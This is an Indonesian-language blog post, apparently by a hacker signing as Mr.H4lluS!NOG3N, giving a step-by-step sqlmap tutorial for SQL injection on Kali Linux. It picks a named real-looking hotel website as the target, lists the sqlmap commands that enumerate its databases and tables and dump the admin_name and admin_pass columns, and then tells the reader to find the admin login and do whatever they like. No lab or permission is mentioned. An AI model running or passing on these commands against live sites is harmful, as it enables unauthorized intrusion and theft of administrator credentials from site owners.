Cara Sql Injection With Sqlmap Dikali linux

Assalamuallaikum Mbah ,apa Kabar Baik kan ,Dihari lebarn ini GUa mau ucapin MinalizinwAlfaizin :p MOhon Maaf lahir batin ya oke disini gua mau berbagi tutor simpel sql injection menggunakan tools dikali linux yaitu sqlmap.oke gak usah basa basi langsung saja tutor nya :)

1.Pertama lu Siapkan Target-nya kalau Belum Cari Digoogle
yaitu bisa menggunakan Keyword = cara sql injection,tutorial hacking sql injection atau apalah terserah lu yg penting dapet target vuln injection

nih Gua Punya Target vuln sql injection

http://www.magnolias-ratchadamri.com/design.php?id=1

2.Buka Terminal lu terus ketik sqlmap -h tekan Enter



maka hasilnya akan seperti ini



3.setelah itu ketik

sqlmap -u http://www.magnolias-ratchadamri.com/design.php?id=1 --dbs

tunggu sampai selesai dan Muncul Pesan-nya SEperti Dibawah ini

 lalu kita ketik huruf Y terus tekan Enter & tunggu sampai selesai dan MUncul Database-nya SEperti Dibawah ini



nih contoh databasenya:
[*] information_schema
[*] magnoliasratchadamr

4.kita lanjut terus ketikan
sqlmap -u http://www.magnolias-ratchadamri.com/design.php?id=1 -D magnoliasratchadamr --tables




nah tunggu sampai selesai apabila muncul pesan warna biru ketik Y terus Pencet Tombol Enter

Kalau SElesai akan Muncul Tables-nya SEperti Gambar Dibawah





5.nah terus kita cari table yg mengandung unsur Seperti Admin,user, pokok nya yang berkaitan dengan username &user pass

6.selanjut nya ketik:
sqlmap -u http://www.magnolias-ratchadamri.com/design.php?id=1 -D magnoliasratchadamr -T admin_user --columns






7.tunggu sampai selesai Sampai Muncul table nya lagi


8.yang terakhir kita buka columns admin_name & admin_pass nya,ketik

sqlmap -u http://www.magnolias-ratchadamri.com/design.php?id=1 -D magnoliasratchadamr -T admin_user -C admin_name,admin_pass --dump





9.selesai Akhir nya MUncul admin_name & admin_pass nya


 10.tinggal kita CARI login adminya Selesai selanjutnya Terserah LOe mau loe apain :D

Sekian Tutorial-nya yo mbah Jangan Lupa NItip NIck GUa Kalau Berhasil Mr.H4lluS!NOG3N dan selamat Mencoba SEmoga BErhasil.




Subscribe to receive free email updates:

0 Response to "Cara Sql Injection With Sqlmap Dikali linux"

Post a Comment